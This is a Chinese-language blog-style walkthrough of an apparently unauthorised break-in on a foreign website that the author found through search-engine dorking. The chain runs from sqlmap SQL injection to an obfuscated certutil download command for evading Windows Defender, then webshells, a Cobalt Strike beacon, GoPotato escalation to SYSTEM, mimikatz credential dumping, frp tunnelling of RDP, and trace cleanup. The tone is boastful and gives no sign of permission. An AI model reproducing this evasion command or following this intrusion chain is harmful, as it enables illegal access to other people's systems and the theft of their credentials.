主要流程：sql注入->cerutil绕df写入文件->webshell上线cs->提权->内网

某天闲的无聊没事做，用谷歌语法测测国外的站

猛的一打开阿  发现这个网站，哥们英文也不好阿 搞不懂不知道这是什么玩意

我们去找下网站的功能点

啪的一下发现一个入口

上祖传的sqlmap 跑下

直接我操，运气这么好，既然这样 那我只能去厨房给你拿下东西，话不多说直接tasklist ping 来一套

后续发现，目标是df，而且 出网，既然这样没有办法 先试试cer远程下载todesk试试

,;;;,@cer^t^u^t^il  -u""""r""""l""""c""""a""""c""""h""""e"""" -split  -f https://dl.todesk.com/irrigation/ToDesk_4.7.0.1.exe C:\Users\Public\todesk.exe

用上面这个是可以绕过df的 不过国内的三件套是过不了的

后续查找配置文件，利用todesk链接 发现非常卡顿，一直停在100%就是上部了桌面

既然这样子，那只能写个免杀的shell上去了

这里我们写的是蚁剑的shell，后续利用蚁剑的文件上传 上传哥斯拉shell

还是用冰蝎把，发现哥斯拉的虚拟终端运行部了，可能流量还是有点问题

好滴，由于哥斯拉虚拟终端运行部了 而且哥斯拉自带的那个mimikatz也抓部了密码，应为不是administatror，接下来我们上线cs

直接上传一个geacon

叮的一下直接上线了

不多说 直接提权

这里我们用的是gopotato

利用gopotao重新运行下geacon就提权成功了 而且cs上线的权限还是system

提权前：

提权后：

接下来直接进程劫持

为什么要进程劫持，因为有时候geacon抓mimikatz会掉线阿，而且geacon不是很稳定的

直接mimikatz

卧槽 好家伙我只能说好家伙

接下来哥们尝试了利用npc上去代理进桌面发现进部了，利用reg尝试代理进去发现也不是很稳定，只好利用frp把他的3389映射出来上了下桌面截图

好了好了 点到为止

直接清理 痕迹，不是这桌面的geacon1是哪个吊毛放的。。